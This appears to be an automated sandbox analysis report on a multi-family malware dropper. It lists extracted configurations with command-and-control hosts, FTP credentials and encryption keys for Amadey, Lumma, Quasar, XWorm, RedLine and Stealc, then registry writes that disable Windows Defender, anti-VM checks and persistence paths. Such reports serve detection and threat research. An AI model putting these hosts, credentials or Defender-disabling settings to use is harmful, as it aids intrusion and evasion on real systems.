Analysis
-
max time kernel
778s -
max time network
1803s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-11-2024 00:41
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win11-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
Protocol: ftp- Host:
52.144.72.2 - Port:
21 - Username:
admin - Password:
robert
Extracted
Protocol: ftp- Host:
2.61.68.17 - Port:
21 - Username:
admin - Password:
lol123
Extracted
Protocol: ftp- Host:
92.63.96.31 - Port:
21 - Username:
user - Password:
hurrr
Extracted
Protocol: ftp- Host:
101.100.248.42 - Port:
21 - Username:
admin - Password:
NETWORKP4SS
Extracted
Protocol: ftp- Host:
37.23.120.64 - Port:
21 - Username:
user - Password:
root
Extracted
Protocol: ftp- Host:
54.36.135.69 - Port:
21 - Username:
user - Password:
121212
Extracted
Protocol: ftp- Host:
154.208.248.76 - Port:
21 - Username:
admin - Password:
1qaz2wsx
Extracted
Protocol: ftp- Host:
35.215.66.107 - Port:
21 - Username:
root - Password:
PC123
Extracted
Protocol: ftp- Host:
201.98.65.109 - Port:
21 - Username:
user - Password:
sunshine
Extracted
Protocol: ftp- Host:
168.206.88.116 - Port:
21 - Username:
ftp - Password:
12qwaszx
Extracted
Protocol: ftp- Host:
34.142.238.122 - Port:
21 - Username:
ftp - Password:
abc123
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://p3ar11fter.sbs
https://3xp3cts1aim.sbs
https://owner-vacat10n.sbs
https://peepburry828.sbs
https://p10tgrace.sbs
https://befall-sm0ker.sbs
https://librari-night.sbs
https://processhol.sbs
https://cook-rain.sbs
https://powerful-avoids.sbs
https://motion-treesz.sbs
https://disobey-curly.sbs
https://leg-sate-boat.sbs
https://story-tense-faz.sbs
https://blade-govern.sbs
https://occupy-blushi.sbs
https://frogs-severz.sbs
https://push-hook.cyou
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://hallowed-noisy.sbs
Extracted
quasar
1.4.1
Office04
5.144.179.134:1604
4d383135-1c23-463e-9bfb-fc292b6c8ee9
-
encryption_key
811B0CD80805D2F78D56441837D161EEF8A6E10A
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.0
Office04
137.184.144.245:4782
6cfe4a65-c41d-4b02-9ae9-e727a748ae84
-
encryption_key
B702BA239316FCF317B584A351F2EC1696EBE772
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
java updater
-
subdirectory
SubDir
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
xworm
147.185.221.22:47930
127.0.0.1:47930
157.66.26.208:8848
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
redline
TG@CVV88888
185.218.125.157:21441
Extracted
quasar
1.4.1
main-pc
192.168.100.2:4444
979e9520-ec25-48f6-8cd4-516d1007358f
-
encryption_key
6B74F0C858B7E90573D4E97997F2A082B9781250
-
install_name
main-pc.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Microsoft Service
-
subdirectory
SubDir
Extracted
quasar
1.4.0.0
Office
82.117.243.110:5173
yfsS9ida0wX8mgpdJC
-
encryption_key
KDNBgA8jiBeGX1rj1dDt
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Signatures
-
Amadey family
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x001a00000002addc-5270.dat family_ammyyadmin -
Ammyyadmin family
-
Detect Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x001600000002ae4d-7323.dat family_vidar_v7 -
Detect Xworm Payload 4 IoCs
Processes:
resource yara_rule behavioral1/files/0x0007000000000695-3648.dat family_xworm behavioral1/memory/5980-3653-0x0000000000020000-0x000000000003A000-memory.dmp family_xworm behavioral1/files/0x001a00000002ab35-3957.dat family_xworm behavioral1/memory/4404-3962-0x0000000000240000-0x0000000000298000-memory.dmp family_xworm -
Detects ZharkBot payload 2 IoCs
ZharkBot is a botnet written C++.
Processes:
resource yara_rule behavioral1/files/0x001900000002ab2d-1274.dat zharkcore behavioral1/files/0x001b00000002ad61-4817.dat zharkcore -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Lokibot family
-
Lumma family
-
Processes:
ae588fb112.exe4C065K.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ae588fb112.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ae588fb112.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4C065K.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4C065K.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection ae588fb112.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ae588fb112.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ae588fb112.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4C065K.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4C065K.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4C065K.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ae588fb112.exe -
Njrat family
-
Phorphiex family
-
Phorphiex payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0002000000025cc5-109.dat family_phorphiex -
Quasar family
-
Quasar payload 9 IoCs
Processes:
resource yara_rule behavioral1/files/0x0002000000025cc7-1229.dat family_quasar behavioral1/memory/2400-1234-0x0000000000D10000-0x0000000001034000-memory.dmp family_quasar behavioral1/files/0x001c00000002ab34-1343.dat family_quasar behavioral1/memory/568-1350-0x0000000000070000-0x00000000000F4000-memory.dmp family_quasar behavioral1/files/0x002000000002acc4-4283.dat family_quasar behavioral1/memory/7132-4288-0x0000000000D50000-0x0000000001074000-memory.dmp family_quasar behavioral1/files/0x001900000002ad9e-5013.dat family_quasar behavioral1/memory/3576-5050-0x00000000005F0000-0x000000000063E000-memory.dmp family_quasar behavioral1/files/0x001b00000002ae69-7731.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/4380-3717-0x0000000000400000-0x0000000000450000-memory.dmp family_redline behavioral1/memory/5604-4630-0x00000000057E0000-0x000000000584E000-memory.dmp family_redline behavioral1/memory/5604-4629-0x00000000032A0000-0x0000000003310000-memory.dmp family_redline behavioral1/files/0x001a00000002ade9-5476.dat family_redline behavioral1/files/0x001f00000002ae00-6970.dat family_redline -
Redline family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
Reynolds.com1712017950.exewinupsecvmgr.exeUl.pifdescription pid Process procid_target PID 868 created 3264 868 Reynolds.com 52 PID 6172 created 3264 6172 1712017950.exe 52 PID 6172 created 3264 6172 1712017950.exe 52 PID 3456 created 3264 3456 winupsecvmgr.exe 52 PID 3456 created 3264 3456 winupsecvmgr.exe 52 PID 3456 created 3264 3456 winupsecvmgr.exe 52 PID 1380 created 3264 1380 Ul.pif 52 -
Vidar family
-
Xworm family
-
Zharkbot family
-
Contacts a large (11398) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
Processes:
c04c9bc948.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF c04c9bc948.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 30 IoCs
Processes:
skotes.exedefnur.exeae588fb112.exeskotes.exeskotes.exeskotes.exedefnur.exe4C065K.exeskotes.exe1H10C4.exe3H03E.exe99add6fb7b.exeskotes.exeskotes.exedefnur.exedefnur.exeskotes.exe59b2d16d94.exeskotes.exerandom.exerodda.exeL.exec04c9bc948.exeecb5f9ca12.exeskotes.exeskotes.exeama.exeskotes.exeskotes.exe2Z1002.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ defnur.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ae588fb112.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ defnur.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4C065K.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1H10C4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3H03E.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 99add6fb7b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ defnur.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ defnur.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 59b2d16d94.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rodda.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c04c9bc948.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ecb5f9ca12.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ama.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2Z1002.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid Process 3398 968 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 5004 powershell.exe 6152 powershell.exe 7996 5296 powershell.exe 6716 powershell.exe 5908 powershell.exe -
Downloads MZ/PE file
-
Indicator Removal: Network Share Connection Removal 1 TTPs 13 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
Processes:
cmd.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.execmd.exenet.exepid Process 2860 cmd.exe 6304 net.exe 2552 net.exe 3456 net.exe 5960 net.exe 3872 net.exe 5600 net.exe 1812 net.exe 980 net.exe 4180 cmd.exe 4992 8768 6948 net.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exepid Process 5808 netsh.exe 764 netsh.exe 7768 -
Uses browser remote debugging 2 TTPs 28 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
Processes:
chrome.exefirefox.exechrome.exemsedge.exechrome.exechrome.exemsedge.exemsedge.exechrome.exefirefox.exechrome.exemsedge.exemsedge.exemsedge.exefirefox.exechrome.exemsedge.exemsedge.exechrome.exechrome.exefirefox.exechrome.exemsedge.exechrome.exechrome.exemsedge.exemsedge.exemsedge.exepid Process 4832 chrome.exe 1156 firefox.exe 6196 chrome.exe 5684 msedge.exe 2824 chrome.exe 4596 chrome.exe 4724 msedge.exe 5924 msedge.exe 6192 chrome.exe 5992 firefox.exe 6156 chrome.exe 2240 msedge.exe 6576 msedge.exe 2084 msedge.exe 5904 firefox.exe 4080 chrome.exe 7148 msedge.exe 4668 msedge.exe 5384 chrome.exe 7032 chrome.exe 1920 firefox.exe 5092 chrome.exe 2996 msedge.exe 6324 chrome.exe 7012 chrome.exe 6616 msedge.exe 6200 msedge.exe 2780 msedge.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/5604-4630-0x00000000057E0000-0x000000000584E000-memory.dmp net_reactor behavioral1/memory/5604-4629-0x00000000032A0000-0x0000000003310000-memory.dmp net_reactor -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule behavioral1/files/0x001b00000002ace9-4347.dat acprotect -
Processes:
resource yara_rule behavioral1/files/0x001a00000002ae6f-8165.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 60 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
random.exeskotes.exeskotes.exedefnur.exeskotes.exerodda.exeae588fb112.exedefnur.exedefnur.exedefnur.exeskotes.exeskotes.exeskotes.exe4C065K.exeL.exec04c9bc948.exeskotes.exeskotes.exeskotes.exe2Z1002.exeskotes.exeskotes.exeecb5f9ca12.exe59b2d16d94.exeskotes.exeskotes.exe3H03E.exeama.exe1H10C4.exe99add6fb7b.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rodda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ae588fb112.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rodda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4C065K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c04c9bc948.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2Z1002.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c04c9bc948.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ecb5f9ca12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 59b2d16d94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3H03E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ae588fb112.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ama.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3H03E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ecb5f9ca12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ama.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1H10C4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1H10C4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 99add6fb7b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 59b2d16d94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 99add6fb7b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2Z1002.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4C065K.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 14 IoCs
Processes:
cmd.exeserver.exedllhost.exeNJRat.execmd.exeIMG001.exesvchost.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.exe dllhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.exe dllhost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe NJRat.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe NJRat.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.url dllhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe -
Executes dropped EXE 64 IoCs
Processes:
random.exeskotes.exe69e99dc7e7.exekreon.exerodda.exeL.exet1.exe0fVlNye.exesysnldcvmr.exevg9qcBa.exevg9qcBa.exevg9qcBa.exeReynolds.comVBVEd6f.exewindowshost.exeuhigdbf.exeZharkBOT.execlamer.exefseawd.exeMesa.com214554010.exeplswork.exeknotc.exeknotc.exeClient.exe99add6fb7b.exe3304426513.exe59b2d16d94.exe22277f3eaa.exeReynolds.com1712017950.exe2290516451.exeae588fb112.exe241228632.exeskotes.exenwdxif.exec04c9bc948.exe1417232562.exeecb5f9ca12.exe1520828593.exewinupsecvmgr.exeskotes.exesvchost.exereddit.exesurfex.exeIMG001.exeskotes.exetftp.exeIMG001.exeXClient.exetftp.exe%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exer.exedayum.exemain.exeserver.exedllhost.exeskotes.exedllhost.exepostbox.exeskotes.exedllhost.exeskotes.exedllhost.exepid Process 4924 random.exe 3352 skotes.exe 3036 69e99dc7e7.exe 2100 kreon.exe 872 rodda.exe 2752 L.exe 2796 t1.exe 4360 0fVlNye.exe 1176 sysnldcvmr.exe 3036 vg9qcBa.exe 3964 vg9qcBa.exe 4544 vg9qcBa.exe 868 Reynolds.com 2120 VBVEd6f.exe 2400 windowshost.exe 4324 uhigdbf.exe 3100 ZharkBOT.exe 3864 clamer.exe 1644 fseawd.exe 1984 Mesa.com 4524 214554010.exe 568 plswork.exe 4972 knotc.exe 792 knotc.exe 6400 Client.exe 6524 99add6fb7b.exe 7028 3304426513.exe 7132 59b2d16d94.exe 7156 22277f3eaa.exe 7004 Reynolds.com 6172 1712017950.exe 6300 2290516451.exe 6784 ae588fb112.exe 2948 241228632.exe 4920 skotes.exe 2096 nwdxif.exe 5784 c04c9bc948.exe 6216 1417232562.exe 2844 ecb5f9ca12.exe 5456 1520828593.exe 3456 winupsecvmgr.exe 5016 skotes.exe 5980 svchost.exe 5160 reddit.exe 6656 surfex.exe 1920 IMG001.exe 6084 skotes.exe 5020 tftp.exe 6832 IMG001.exe 4404 XClient.exe 4952 tftp.exe 5308 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5328 r.exe 760 dayum.exe 5800 main.exe 1856 server.exe 2248 dllhost.exe 6356 skotes.exe 5168 dllhost.exe 5524 postbox.exe 6484 skotes.exe 4708 dllhost.exe 2692 skotes.exe 4164 dllhost.exe -
Identifies Wine through registry keys 2 TTPs 30 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
skotes.exeskotes.exedefnur.exe2Z1002.exerodda.exeL.exe59b2d16d94.exeskotes.exe3H03E.exe4C065K.exedefnur.exeskotes.exeae588fb112.exec04c9bc948.exerandom.exeskotes.exeskotes.exedefnur.exeskotes.exeskotes.exeama.exe1H10C4.exe99add6fb7b.exeecb5f9ca12.exeskotes.exeskotes.exeskotes.exeskotes.exeskotes.exedefnur.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine defnur.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine 2Z1002.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine rodda.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine L.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine 59b2d16d94.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine 3H03E.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine 4C065K.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine defnur.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine ae588fb112.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine c04c9bc948.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine defnur.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine ama.exe Key opened 